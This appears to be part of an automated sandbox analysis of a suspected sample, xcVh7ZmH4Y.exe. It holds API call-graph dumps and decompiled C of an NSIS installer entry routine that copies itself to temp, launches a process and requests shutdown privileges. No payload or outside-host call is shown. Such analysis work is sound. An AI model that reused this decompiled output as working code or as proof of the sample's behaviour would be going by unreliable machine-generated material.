4841->4842 4843 40456d SetBkMode 4841->4843 4842->4843 4844 404585 GetSysColor 4843->4844 4845 40458b 4843->4845 4844->4845 4846 404592 SetBkColor 4845->4846 4847 40459c 4845->4847 4846->4847 4847->4838 4848 4045b6 CreateBrushIndirect 4847->4848 4849 4045af DeleteObject 4847->4849 4848->4838 4849->4848 4850 401b9b 4851 401ba8 4850->4851 4852 401bec 4850->4852 4855 401c31 4851->4855 4860 401bbf 4851->4860 4853 401bf1 4852->4853 4854 401c16 GlobalAlloc 4852->4854 4863 40239d 4853->4863 4871 40653d lstrcpynW 4853->4871 4857 40657a 17 API calls 4854->4857 4856 40657a 17 API calls 4855->4856 4855->4863 4859 402397 4856->4859 4857->4855 4859->4863 4864 405b9d MessageBoxIndirectW 4859->4864 4869 40653d lstrcpynW 4860->4869 4861 401c03 GlobalFree 4861->4863 4864->4863 4865 401bce 4870 40653d lstrcpynW 4865->4870 4867 401bdd 4872 40653d lstrcpynW 4867->4872 4869->4865 4870->4867 4871->4861 4872->4863 5579 40261c 5580 402da6 17 API calls 5579->5580 5581 402623 5580->5581 5584 40602d GetFileAttributesW CreateFileW 5581->5584 5583 40262f 5584->5583 4937 40259e 4938 402de6 17 API calls 4937->4938 4939 4025a8 4938->4939 4940 402d84 17 API calls 4939->4940 4941 4025b1 4940->4941 4942 4025d9 RegEnumValueW 4941->4942 4943 4025cd RegEnumKeyW 4941->4943 4944 40292e 4941->4944 4945 4025f5 RegCloseKey 4942->4945 4946 4025ee 4942->4946 4943->4945 4945->4944 4946->4945 5585 40149e 5586 4014ac PostQuitMessage 5585->5586 5587 40239d 5585->5587 5586->5587 5588 4015a3 5589 402da6 17 API calls 5588->5589 5590 4015aa SetFileAttributesW 5589->5590 5591 4015bc 5590->5591 5592 401fa4 5593 402da6 17 API calls 5592->5593 5594 401faa 5593->5594 5595 40559f 24 API calls 5594->5595 5596 401fb4 5595->5596 5597 405b20 2 API calls 5596->5597 5598 401fba 5597->5598 5599 4069b5 5 API calls 5598->5599 5602 40292e 5598->5602 5603 401fdd CloseHandle 5598->5603 5601 401fcf 5599->5601 5601->5603 5605 406484 wsprintfW 5601->5605 5603->5602 5605->5603 5606 7354103d 5607 7354101b 5 API calls 5606->5607 5608 73541056 5607->5608 4225 40252a 4236 402de6 4225->4236 4228 402da6 17 API calls 4229 40253d 4228->4229 4230 402548 RegQueryValueExW 4229->4230 4235 40292e 4229->4235 4231 40256e RegCloseKey 4230->4231 4232 402568 4230->4232 4231->4235 4232->4231 4241 406484 wsprintfW 4232->4241 4237 402da6 17 API calls 4236->4237 4238 402dfd 4237->4238 4239 4063aa RegOpenKeyExW 4238->4239 4240 402534 4239->4240 4240->4228 4241->4231 5609 40202a 5610 402da6 17 API calls 5609->5610 5611 402031 5610->5611 5612 40690a 5 API calls 5611->5612 5613 402040 5612->5613 5614 4020cc 5613->5614 5615 40205c GlobalAlloc 5613->5615 5615->5614 5616 402070 5615->5616 5617 40690a 5 API calls 5616->5617 5618 402077 5617->5618 5619 40690a 5 API calls 5618->5619 5620 402081 5619->5620 5620->5614 5624 406484 wsprintfW 5620->5624 5622 4020ba 5625 406484 wsprintfW 5622->5625 5624->5622 5625->5614 5626 4021aa 5627 402da6 17 API calls 5626->5627 5628 4021b1 5627->5628 5629 402da6 17 API calls 5628->5629 5630 4021bb 5629->5630 5631 402da6 17 API calls 5630->5631 5632 4021c5 5631->5632 5633 402da6 17 API calls 5632->5633 5634 4021cf 5633->5634 5635 402da6 17 API calls 5634->5635 5636 4021d9 5635->5636 5637 402218 CoCreateInstance 5636->5637 5638 402da6 17 API calls 5636->5638 5641 402237 5637->5641 5638->5637 5639 401423 24 API calls 5640 4022f6 5639->5640 5641->5639 5641->5640 5642 403baa 5643 403bb5 5642->5643 5644 403bb9 5643->5644 5645 403bbc GlobalAlloc 5643->5645 5645->5644 4252 40352d SetErrorMode GetVersionExW 4253 4035b7 4252->4253 4254 40357f GetVersionExW 4252->4254 4255 403610 4253->4255 4256 40690a 5 API calls 4253->4256 4254->4253 4257 40689a 3 API calls 4255->4257 4256->4255 4258 403626 lstrlenA 4257->4258 4258->4255 4259 403636 4258->4259 4260 40690a 5 API calls 4259->4260 4261 40363d 4260->4261 4262 40690a 5 API calls 4261->4262 4263 403644 4262->4263 4264 40690a 5 API calls 4263->4264 4265 403650 #17 OleInitialize SHGetFileInfoW 4264->4265 4343 40653d lstrcpynW 4265->4343 4268 40369d GetCommandLineW 4344 40653d lstrcpynW 4268->4344 4270 4036af 4271 405e39 CharNextW 4270->4271 4272 4036d5 CharNextW 4271->4272 4283 4036e6 4272->4283 4273 4037e4 4274 4037f8 GetTempPathW 4273->4274 4345 4034fc 4274->4345 4276 403810 4278 403814 GetWindowsDirectoryW lstrcatW 4276->4278 4279 40386a DeleteFileW 4276->4279 4277 405e39 CharNextW 4277->4283 4281 4034fc 12 API calls 4278->4281 4355 40307d GetTickCount GetModuleFileNameW 4279->4355 4284 403830 4281->4284 4282 40387d 4285 403941 4282->4285 4288 403932 4282->4288 4292 405e39 CharNextW 4282->4292 4283->4273 4283->4277 4287 4037e6 4283->4287 4284->4279 4286 403834 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4284->4286 4447 403b12 4285->4447 4291 4034fc 12 API calls 4286->4291 4439 40653d lstrcpynW 4287->4439 4383 403bec 4288->4383 4295 403862 4291->4295 4308 40389f 4292->4308 4295->4279 4295->4285 4296 403a69 4454 405b9d 4296->4454 4297 403a7e 4298 403a86 GetCurrentProcess OpenProcessToken 4297->4298 4299 403afc ExitProcess 4297->4299 4301 403acc 4298->4301 4302 403a9d LookupPrivilegeValueW AdjustTokenPrivileges 4298->4302 4307 40690a 5 API calls 4301->4307 4302->4301 4304 403908 4310 405f14 18 API calls 4304->4310 4305 403949 4309 405b08 5 API calls 4305->4309 4311 403ad3 4307->4311 4308->4304 4308->4305 4312 40394e lstrcatW 4309->4312 4313 403914 4310->4313 4314 403ae8 ExitWindowsEx 4311->4314 4318 403af5 4311->4318 4315 40396a lstrcatW lstrcmpiW 4312->4315 4316 40395f lstrcatW 4312->4316 4313->4285 4440 40653d lstrcpynW 4313->4440 4314->4299 4314->4318 4315->4285 4319 40398a 4315->4319 4316->4315 4458 40140b 4318->4458 4322 403996 4319->4322 4323 40398f 4319->4323 4320 403927 4441 40653d lstrcpynW 4320->4441 4324 405aeb 2 API calls 4322->4324 4326 405a6e 4 API calls 4323->4326 4328 40399b SetCurrentDirectoryW 4324->4328 4327 403994 4326->4327 4327->4328 4329 4039b8 4328->4329 4330 4039ad 4328->4330 4443 40653d lstrcpynW 4329->4443 4442 40653d lstrcpynW 4330->4442 4333 40657a 17 API calls 4334 4039fa DeleteFileW 4333->4334 4335 403a06 CopyFileW 4334->4335 4339 4039c5 4334->4339 4335->4339 4336 403a50 4337 4062fd 36 API calls 4336->4337 4337->4285 4338 4062fd 36 API calls 4338->4339 4339->4333 4339->4336 4339->4338 4340 40657a 17 API calls 4339->4340 4342 403a3a CloseHandle 4339->4342 4444 405b20 CreateProcessW 4339->4444 4340->4339 4342->4339 4343->4268 4344->4270 4346 4067c4 5 API calls 4345->4346 4348 403508 4346->4348 4347 403512 4347->4276 4348->4347 4349 405e0c 3 API calls 4348->4349 4350 40351a 4349->4350 4351 405aeb 2 API calls 4350->4351 4352 403520 4351->4352 4461 40605c 4352->4461 4465 40602d GetFileAttributesW CreateFileW 4355->4465 4357 4030bd 4376 4030cd 4357->4376 4466 40653d lstrcpynW 4357->4466 4359 4030e3 4360 405e58 2 API calls 4359->4360 4361 4030e9 4360->4361 4467 40653d lstrcpynW 4361->4467 4363 4030f4 GetFileSize 4364 4031ee 4363->4364 4382 40310b 4363->4382 4468 403019 4364->4468 4366 4031f7 4368 403227 GlobalAlloc 4366->4368 4366->4376 4480 4034e5 SetFilePointer 4366->4480 4367 4034cf ReadFile 4367->4382 4479 4034e5 SetFilePointer 4368->4479 4371 40325a 4373 403019 6 API calls 4371->4373 4372 403242 4375 4032b4 31 API calls 4372->4375 4373->4376 4374 403210 4377 4034cf ReadFile 4374->4377 4380 40324e 4375->4380 4376->4282 4378 40321b 4377->4378 4378->4368 4378->4376 4379 403019 6 API calls 4379->4382 4380->4376 4380->4380 4381 40328b SetFilePointer 4380->4381 4381->4376 4382->4364 4382->4367 4382->4371 4382->4376 4382->4379 4384 40690a 5 API calls 4383->4384 4385 403c00 4384->4385 4386 403c06 4385->4386 4387 403c18 4385->4387 4500 406484 wsprintfW 4386->4500 4388 40640b 3 API calls 4387->4388 4389 403c48 4388->4389 4391 403c67 lstrcatW 4389->4391 4393 40640b 3 API calls 4389->4393 4392 403c16 4391->4392 4485 403ec2 4392->4485 4393->4391 4396 405f14 18 API calls 4397 403c99 4396->4397 4398 403d2d 4397->4398 4400 40640b 3 API calls 4397->4400 4399 405f14 18 API calls 4398->4399 4401 403d33 4399->4401 4402 403ccb 4400->4402 4403 403d43 LoadImageW 4401->4403 4404 40657a 17 API calls 4401->4404 4402->4398 4407 403cec lstrlenW 4402->4407 4410 405e39 CharNextW 4402->4410 4405 403de9 4403->4405 4406 403d6a RegisterClassW 4403->4406 4404->4403 4409 40140b 2 API calls 4405->4409 4408 403da0 SystemParametersInfoW CreateWindowExW 4406->4408 4438 403df3 4406->4438 4411 403d20 4407->4411 4412 403cfa lstrcmpiW 4407->4412 4408->4405 4413 403def 4409->4413 4415 403ce9 4410->4415 4414 405e0c 3 API calls 4411->4414 4412->4411 4416 403d0a GetFileAttributesW 4412->4416 4417 403ec2 18 API calls 4413->4417 4413->4438 4418 403d26 4414->4418 4415->4407 4419 403d16 4416->4419 4420 403e00 4417->4420 4501 40653d lstrcpynW 4418->4501 4419->4411 4422 405e58 2 API calls 4419->4422 4423 403e0c ShowWindow 4420->4423 4424 403e8f 4420->4424 4422->4411 4425 40689a 3 API calls 4423->4425 4493 405672 OleInitialize 4424->4493 4428 403e24 4425->4428 4427 403e95 4429 403eb1 4427->4429 4430 403e99 4427->4430 4431 403e32 GetClassInfoW 4428->4431 4433 40689a 3 API calls 4428->4433 4432 40140b 2 API calls 4429->4432 4436 40140b 2 API calls 4430->4436 4430->4438 4434 403e46 GetClassInfoW RegisterClassW 4431->4434 4435 403e5c DialogBoxParamW 4431->4435 4432->4438 4433->4431 4434->4435 4437 40140b 2 API calls 4435->4437 4436->4438 4437->4438 4438->4285 4439->4274 4440->4320 4441->4288 4442->4329 4443->4339 4445 405b53 CloseHandle 4444->4445 4446 405b5f 4444->4446 4445->4446 4446->4339 4448 403b2a 4447->4448 4449 403b1c CloseHandle 4447->4449 4513 403b57 4448->4513 4449->4448 4452 405c49 67 API calls 4453 403a5e OleUninitialize 4452->4453 4453->4296 4453->4297 4455 405bb2 4454->4455 4456 403a76 ExitProcess 4455->4456 4457 405bc6 MessageBoxIndirectW 4455->4457 4457->4456 4459 401389 2 API calls 4458->4459 4460 401420 4459->4460 4460->4299 4462 406069 GetTickCount GetTempFileNameW 4461->4462 4463 40352b 4462->4463 4464 40609f 4462->4464 4463->4276 4464->4462 4464->4463 4465->4357 4466->4359 4467->4363 4469 403022 4468->4469 4470 40303a 4468->4470 4471 403032 4469->4471 4472 40302b DestroyWindow 4469->4472 4473 403042 4470->4473 4474 40304a GetTickCount 4470->4474 4471->4366 4472->4471 4481 406946 4473->4481 4476 403058 CreateDialogParamW ShowWindow 4474->4476 4477 40307b 4474->4477 4476->4477 4477->4366 4479->4372 4480->4374 4482 406963 PeekMessageW 4481->4482 4483 403048 4482->4483 4484 406959 DispatchMessageW 4482->4484 4483->4366 4484->4482 4486 403ed6 4485->4486 4502 406484 wsprintfW 4486->4502 4488 403f47 4503 403f7b 4488->4503 4490 403c77 4490->4396 4491 403f4c 4491->4490 4492 40657a 17 API calls 4491->4492 4492->4491 4506 4044e5 4493->4506 4495 405695 4498 4056bc 4495->4498 4509 401389 4495->4509 4496 4044e5 SendMessageW 4497 4056ce OleUninitialize 4496->4497 4497->4427 4498->4496 4500->4392 4501->4398 4502->4488 4504 40657a 17 API calls 4503->4504 4505 403f89 SetWindowTextW 4504->4505 4505->4491 4507 4044fd 4506->4507 4508 4044ee SendMessageW 4506->4508 4507->4495 4508->4507 4511 401390 4509->4511 4510 4013fe 4510->4495 4511->4510 4512 4013cb MulDiv SendMessageW 4511->4512 4512->4511 4514 403b65 4513->4514 4515 403b6a FreeLibrary GlobalFree 4514->4515 4516 403b2f 4514->4516 4515->4515 4515->4516 4516->4452 5646 401a30 5647 402da6 17 API calls 5646->5647 5648 401a39 ExpandEnvironmentStringsW 5647->5648 5649 401a4d 5648->5649 5651 401a60 5648->5651 5650 401a52 lstrcmpW 5649->5650 5649->5651 5650->5651 4558 4023b2 4559 4023c0 4558->4559 4560 4023ba 4558->4560 4562 402da6 17 API calls 4559->4562 4566 4023ce 4559->4566 4561 402da6 17 API calls 4560->4561 4561->4559 4562->4566 4563 4023dc 4565 402da6 17 API calls 4563->4565 4564 402da6 17 API calls 4564->4563 4567 4023e5 WritePrivateProfileStringW 4565->4567 4566->4563 4566->4564 5657 402434 5658 402467 5657->5658 5659 40243c 5657->5659 5661 402da6 17 API calls 5658->5661 5660 402de6 17 API calls 5659->5660 5664 402443 5660->5664 5662 40246e 5661->5662 5668 402e64 5662->5668 5665 40247b 5664->5665 5666 402da6 17 API calls 5664->5666 5667 402454 RegDeleteValueW RegCloseKey 5666->5667 5667->5665 5669 402e71 5668->5669 5670 402e78 5668->5670 5669->5665 5670->5669 5672 402ea9 5670->5672 5673 4063aa RegOpenKeyExW 5672->5673 5674 402ed7 5673->5674 5675 402f81 5674->5675 5676 402ee7 RegEnumValueW 5674->5676 5680 402f0a 5674->5680 5675->5669 5677 402f71 RegCloseKey 5676->5677 5676->5680 5677->5675 5678 402f46 RegEnumKeyW 5679 402f4f RegCloseKey 5678->5679 5678->5680 5681 40690a 5 API calls 5679->5681 5680->5677 5680->5678 5680->5679 5682 402ea9 6 API calls 5680->5682 5683 402f5f 5681->5683 5682->5680 5683->5675 5684 402f63 RegDeleteKeyW 5683->5684 5684->5675 5685 401735 5686 402da6 17 API calls 5685->5686 5687 40173c SearchPathW 5686->5687 5688 401757 5687->5688 5689 4014b8 5690 4014be 5689->5690 5691 401389 2 API calls 5690->5691 5692 4014c6 5691->5692 5693 401d38 5694 402d84 17 API calls 5693->5694 5695 401d3f 5694->5695 5696 402d84 17 API calls 5695->5696 5697 401d4b GetDlgItem 5696->5697 5698 402638 5697->5698 5699 40263e 5700 402652 5699->5700 5701 40266d 5699->5701 5702 402d84 17 API calls 5700->5702 5703 402672 5701->5703 5704 40269d 5701->5704 5712 402659 5702->5712 5705 402da6 17 API calls 5703->5705 5706 402da6 17 API calls 5704->5706 5707 402679 5705->5707 5708 4026a4 lstrlenW 5706->5708 5716 40655f WideCharToMultiByte 5707->5716 5708->5712 5710 40268d lstrlenA 5710->5712 5711 4026e7 5712->5711 5714 40610e 5 API calls 5712->5714 5715 4026d1 5712->5715 5713 4060df WriteFile 5713->5711 5714->5715 5715->5711 5715->5713 5716->5710

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 40352d-40357d SetErrorMode GetVersionExW 1 4035b7-4035be 0->1 2 40357f-4035b3 GetVersionExW 0->2 3 4035c0 1->3 4 4035c8-403608 1->4 2->1 3->4 5 40360a-403612 call 40690a 4->5 6 40361b 4->6 5->6 11 403614 5->11 8 403620-403634 call 40689a lstrlenA 6->8 13 403636-403652 call 40690a * 3 8->13 11->6 20 403663-4036c5 #17 OleInitialize SHGetFileInfoW call 40653d GetCommandLineW call 40653d 13->20 21 403654-40365a 13->21 28 4036c7-4036c9 20->28 29 4036ce-4036e1 call 405e39 CharNextW 20->29 21->20 25 40365c 21->25 25->20 28->29 32 4037d8-4037de 29->32 33 4037e4 32->33 34 4036e6-4036ec 32->34 35 4037f8-403812 GetTempPathW call 4034fc 33->35 36 4036f5-4036fb 34->36 37 4036ee-4036f3 34->37 47 403814-403832 GetWindowsDirectoryW lstrcatW call 4034fc 35->47 48 40386a-403882 DeleteFileW call 40307d 35->48 38 403702-403706 36->38 39 4036fd-403701 36->39 37->36 37->37 41 4037c6-4037d4 call 405e39 38->41 42 40370c-403712 38->42 39->38 41->32 56 4037d6-4037d7 41->56 45 403714-40371b 42->45 46 40372c-403765 42->46 51 403722 45->51 52 40371d-403720 45->52 53 403781-4037bb 46->53 54 403767-40376c 46->54 47->48 66 403834-403864 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4034fc 47->66 62 403888-40388e 48->62 63 403a59-403a67 call 403b12 OleUninitialize 48->63 51->46 52->46 52->51 60 4037c3-4037c5 53->60 61 4037bd-4037c1 53->61 54->53 58 40376e-403776 54->58 56->32 64 403778-40377b 58->64 65 40377d 58->65 60->41 61->60 67 4037e6-4037f3 call 40653d 61->67 68 403894-4038a7 call 405e39 62->68 69 403935-40393c call 403bec 62->69 79 403a69-403a78 call 405b9d ExitProcess 63->79 80 403a7e-403a84 63->80 64->53 64->65 65->53 66->48 66->63 67->35 83 4038f9-403906 68->83 84 4038a9-4038de 68->84 78 403941-403944 69->78 78->63 81 403a86-403a9b GetCurrentProcess OpenProcessToken 80->81 82 403afc-403b04 80->82 86 403acc-403ada call 40690a 81->86 87 403a9d-403ac6 LookupPrivilegeValueW AdjustTokenPrivileges 81->87 89 403b06 82->89 90 403b09-403b0c ExitProcess 82->90 91 403908-403916 call 405f14 83->91 92 403949-40395d call 405b08 lstrcatW 83->92 88 4038e0-4038e4 84->88 104 403ae8-403af3 ExitWindowsEx 86->104 105 403adc-403ae6 86->105 87->86 95 4038e6-4038eb 88->95 96 4038ed-4038f5 88->96 89->90 91->63 103 40391c-403932 call 40653d * 2 91->103 106 40396a-403984 lstrcatW lstrcmpiW 92->106 107 40395f-403965 lstrcatW 92->107 95->96 100 4038f7 95->100 96->88 96->100 100->83 103->69 104->82 109 403af5-403af7 call 40140b 104->109 105->104 105->109 110 403a57 106->110 111 40398a-40398d 106->111 107->106 109->82 110->63 115 403996 call 405aeb 111->115 116 40398f-403994 call 405a6e 111->116 121 40399b-4039ab SetCurrentDirectoryW 115->121 116->121 123 4039b8-4039e4 call 40653d 121->123 124 4039ad-4039b3 call 40653d 121->124 128 4039e9-403a04 call 40657a DeleteFileW 123->128 124->123 131 403a44-403a4e 128->131 132 403a06-403a16 CopyFileW 128->132 131->128 133 403a50-403a52 call 4062fd 131->133 132->131 134 403a18-403a38 call 4062fd call 40657a call 405b20 132->134 133->110 134->131 142 403a3a-403a41 CloseHandle 134->142 142->131
                                                C-Code - Quality: 79%
                                                			_entry_() {
                                                				WCHAR* _v8;
                                                				signed int _v12;
                                                				void* _v16;
                                                				signed int _v20;
                                                				int _v24;
                                                				int _v28;
                                                				struct _TOKEN_PRIVILEGES _v40;
                                                				signed char _v42;
                                                				int _v44;
                                                				signed int _v48;
                                                				intOrPtr _v278;
                                                				signed short _v310;
                                                				struct _OSVERSIONINFOW _v324;
                                                				struct _SHFILEINFOW _v1016;
                                                				intOrPtr* _t88;
                                                				WCHAR* _t92;
                                                				char* _t94;
                                                				void _t97;
                                                				void* _t116;
                                                				WCHAR* _t118;
                                                				signed int _t120;
                                                				intOrPtr* _t124;
                                                				void* _t138;
                                                				short _t144;
                                                				void* _t149;
                                                				void* _t153;
                                                				void* _t158;
                                                				signed int _t168;
                                                				void* _t171;
                                                				void* _t176;
                                                				intOrPtr _t178;
                                                				intOrPtr _t179;
                                                				intOrPtr* _t180;
                                                				int _t189;
                                                				void* _t190;
                                                				void* _t199;
                                                				signed int _t205;
                                                				signed int _t210;
                                                				signed int _t215;
                                                				signed int _t217;
                                                				int* _t219;
                                                				signed int _t227;
                                                				signed int _t230;
                                                				CHAR* _t232;
                                                				char* _t233;
                                                				signed int _t234;
                                                				WCHAR* _t235;
                                                				void* _t251;
                                                
                                                				_t217 = 0x20;
                                                				_t189 = 0;
                                                				_v24 = 0;
                                                				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
                                                				_v20 = 0;
                                                				SetErrorMode(0x8001); // executed
                                                				_v324.szCSDVersion = 0;
                                                				_v48 = 0;
                                                				_v44 = 0;
                                                				_v324.dwOSVersionInfoSize = 0x11c;
                                                				if(GetVersionExW( &_v324) == 0) {
                                                					_v324.dwOSVersionInfoSize = 0x114;
                                                					GetVersionExW( &_v324);
                                                					asm("sbb eax, eax");
                                                					_v42 = 4;
                                                					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
                                                				}
                                                				if(_v324.dwMajorVersion < 0xa) {
                                                					_v310 = _v310 & 0x00000000;
                                                				}
                                                				 *0x434fb8 = _v324.dwBuildNumber;
                                                				 *0x434fbc = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
                                                				if( *0x434fbe != 0x600) {
                                                					_t180 = E0040690A(_t189);
                                                					if(_t180 != _t189) {
                                                						 *_t180(0xc00);
                                                					}
                                                				}
                                                				_t232 = "UXTHEME";
                                                				do {
                                                					E0040689A(_t232); // executed
                                                					_t232 =  &(_t232[lstrlenA(_t232) + 1]);
                                                				} while ( *_t232 != 0);
                                                				E0040690A(0xb);
                                                				 *0x434f04 = E0040690A(9);
                                                				_t88 = E0040690A(7);
                                                				if(_t88 != _t189) {
                                                					_t88 =  *_t88(0x1e);
                                                					if(_t88 != 0) {
                                                						 *0x434fbc =  *0x434fbc | 0x00000080;
                                                					}
                                                				}
                                                				__imp__#17();
                                                				__imp__OleInitialize(_t189); // executed
                                                				 *0x434fc0 = _t88;
                                                				SHGetFileInfoW(0x42b228, _t189,  &_v1016, 0x2b4, _t189); // executed
                                                				E0040653D(0x433f00, L"NSIS Error");
                                                				_t92 = GetCommandLineW();
                                                				_t233 = L"\"C:\\Users\\engineer\\Desktop\\xcVh7ZmH4Y.exe\" ";
                                                				E0040653D(_t233, _t92);
                                                				_t94 = _t233;
                                                				_t234 = 0x22;
                                                				 *0x434f00 = 0x400000;
                                                				_t251 = L"\"C:\\Users\\engineer\\Desktop\\xcVh7ZmH4Y.exe\" " - _t234; // 0x22
                                                				if(_t251 == 0) {
                                                					_t217 = _t234;
                                                					_t94 =  &M00440002;
                                                				}
                                                				_t199 = CharNextW(E00405E39(_t94, _t217));
                                                				_v16 = _t199;
                                                				while(1) {
                                                					_t97 =  *_t199;
                                                					_t252 = _t97 - _t189;
                                                					if(_t97 == _t189) {
                                                						break;
                                                					}
                                                					_t210 = 0x20;
                                                					__eflags = _t97 - _t210;
                                                					if(_t97 != _t210) {
                                                						L17:
                                                						__eflags =  *_t199 - _t234;
                                                						_v12 = _t210;
                                                						if( *_t199 == _t234) {
                                                							_v12 = _t234;
                                                							_t199 = _t199 + 2;
                                                							__eflags = _t199;
                                                						}
                                                						__eflags =  *_t199 - 0x2f;
                                                						if( *_t199 != 0x2f) {
                                                							L32:
                                                							_t199 = E00405E39(_t199, _v12);
                                                							__eflags =  *_t199 - _t234;
                                                							if(__eflags == 0) {
                                                								_t199 = _t199 + 2;
                                                								__eflags = _t199;
                                                							}
                                                							continue;
                                                						} else {
                                                							_t199 = _t199 + 2;
                                                							__eflags =  *_t199 - 0x53;
                                                							if( *_t199 != 0x53) {
                                                								L24:
                                                								asm("cdq");
                                                								asm("cdq");
                                                								_t215 = L"NCRC" & 0x0000ffff;
                                                								asm("cdq");
                                                								_t227 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t215;
                                                								__eflags =  *_t199 - (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215);
                                                								if( *_t199 != (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215)) {
                                                									L29:
                                                									asm("cdq");
                                                									asm("cdq");
                                                									_t210 = L" /D=" & 0x0000ffff;
                                                									asm("cdq");
                                                									_t230 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t210;
                                                									__eflags =  *(_t199 - 4) - (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210);
                                                									if( *(_t199 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210)) {
                                                										L31:
                                                										_t234 = 0x22;
                                                										goto L32;
                                                									}
                                                									__eflags =  *_t199 - _t230;
                                                									if( *_t199 == _t230) {
                                                										 *(_t199 - 4) = _t189;
                                                										__eflags = _t199;
                                                										E0040653D(L"C:\\Users\\engineer\\AppData\\Local\\Temp", _t199);
                                                										L37:
                                                										_t235 = L"C:\\Users\\engineer\\AppData\\Local\\Temp\\";
                                                										GetTempPathW(0x400, _t235); // executed
                                                										_t116 = E004034FC(_t199, _t252);
                                                										_t253 = _t116;
                                                										if(_t116 != 0) {
                                                											L40:
                                                											DeleteFileW(L"1033"); // executed
                                                											_t118 = E0040307D(_t255, _v20); // executed
                                                											_v8 = _t118;
                                                											if(_t118 != _t189) {
                                                												L68:
                                                												E00403B12();
                                                												__imp__OleUninitialize();
                                                												if(_v8 == _t189) {
                                                													if( *0x434f94 == _t189) {
                                                														L77:
                                                														_t120 =  *0x434fac;
                                                														if(_t120 != 0xffffffff) {
                                                															_v24 = _t120;
                                                														}
                                                														ExitProcess(_v24);
                                                													}
                                                													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
                                                														LookupPrivilegeValueW(_t189, L"SeShutdownPrivilege",  &(_v40.Privileges));
                                                														_v40.PrivilegeCount = 1;
                                                														_v28 = 2;
                                                														AdjustTokenPrivileges(_v16, _t189,  &_v40, _t189, _t189, _t189);
                                                													}
                                                													_t124 = E0040690A(4);
                                                													if(_t124 == _t189) {
                                                														L75:
                                                														if(ExitWindowsEx(2, 0x80040002) != 0) {
                                                															goto L77;
                                                														}
                                                														goto L76;
                                                													} else {
                                                														_push(0x80040002);
                                                														_push(0x25);
                                                														_push(_t189);
                                                														_push(_t189);
                                                														_push(_t189);
                                                														if( *_t124() == 0) {
                                                															L76:
                                                															E0040140B(9);
                                                															goto L77;
                                                														}
                                                														goto L75;
                                                													}
                                                												}
                                                												E00405B9D(_v8, 0x200010);
                                                												ExitProcess(2);
                                                											}
                                                											if( *0x434f1c == _t189) {
                                                												L51:
                                                												 *0x434fac =  *0x434fac | 0xffffffff;
                                                												_v24 = E00403BEC(_t265);
                                                												goto L68;
                                                											}
                                                											_t219 = E00405E39(L"\"C:\\Users\\engineer\\Desktop\\xcVh7ZmH4Y.exe\" ", _t189);
                                                											if(_t219 < L"\"C:\\Users\\engineer\\Desktop\\xcVh7ZmH4Y.exe\" ") {
                                                												L48:
                                                												_t264 = _t219 - L"\"C:\\Users\\engineer\\Desktop\\xcVh7ZmH4Y.exe\" ";
                                                												_v8 = L"Error launching installer";
                                                												if(_t219 < L"\"C:\\Users\\engineer\\Desktop\\xcVh7ZmH4Y.exe\" ") {
                                                													_t190 = E00405B08(__eflags);
                                                													lstrcatW(_t235, L"~nsu");
                                                													__eflags = _t190;
                                                													if(_t190 != 0) {
                                                														lstrcatW(_t235, "A");
                                                													}
                                                													lstrcatW(_t235, L".tmp");
                                                													_t138 = lstrcmpiW(_t235, 0x441800);
                                                													__eflags = _t138;
                                                													if(_t138 == 0) {
                                                														L67:
                                                														_t189 = 0;
                                                														__eflags = 0;
                                                														goto L68;
                                                													} else {
                                                														__eflags = _t190;
                                                														_push(_t235);
                                                														if(_t190 == 0) {
                                                															E00405AEB();
                                                														} else {
                                                															E00405A6E();
                                                														}
                                                														SetCurrentDirectoryW(_t235);
                                                														__eflags = L"C:\\Users\\engineer\\AppData\\Local\\Temp"; // 0x43
                                                														if(__eflags == 0) {
                                                															E0040653D(L"C:\\Users\\engineer\\AppData\\Local\\Temp", 0x441800);
                                                														}
                                                														E0040653D(L"ppingA", _v16);
                                                														_t202 = "A" & 0x0000ffff;
                                                														_t144 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
                                                														__eflags = _t144;
                                                														_v12 = 0x1a;
                                                														L"C:\\Users\\engineer\\AppData\\Local\\Temp\\Borders.dat" = _t144;
                                                														do {
                                                															E0040657A(0, 0x42aa28, _t235, 0x42aa28,  *((intOrPtr*)( *0x434f10 + 0x120)));
                                                															DeleteFileW(0x42aa28);
                                                															__eflags = _v8;
                                                															if(_v8 != 0) {
                                                																_t149 = CopyFileW(L"C:\\Users\\engineer\\Desktop\\xcVh7ZmH4Y.exe", 0x42aa28, 1);
                                                																__eflags = _t149;
                                                																if(_t149 != 0) {
                                                																	E004062FD(_t202, 0x42aa28, 0);
                                                																	E0040657A(0, 0x42aa28, _t235, 0x42aa28,  *((intOrPtr*)( *0x434f10 + 0x124)));
                                                																	_t153 = E00405B20(0x42aa28);
                                                																	__eflags = _t153;
                                                																	if(_t153 != 0) {
                                                																		CloseHandle(_t153);
                                                																		_v8 = 0;
                                                																	}
                                                																}
                                                															}
                                                															L"C:\\Users\\engineer\\AppData\\Local\\Temp\\Borders.dat" =  &(L"C:\\Users\\engineer\\AppData\\Local\\Temp\\Borders.dat"[0]);
                                                															_t61 =  &_v12;
                                                															 *_t61 = _v12 - 1;
                                                															__eflags =  *_t61;
                                                														} while ( *_t61 != 0);
                                                														E004062FD(_t202, _t235, 0);
                                                														goto L67;
                                                													}
                                                												}
                                                												 *_t219 = _t189;
                                                												_t222 =  &(_t219[2]);
                                                												_t158 = E00405F14(_t264,  &(_t219[2]));
                                                												_t265 = _t158;
                                                												if(_t158 == 0) {
                                                													goto L68;
                                                												}
                                                												E0040653D(L"C:\\Users\\engineer\\AppData\\Local\\Temp", _t222);
                                                												E0040653D(0x441000, _t222);
                                                												_v8 = _t189;
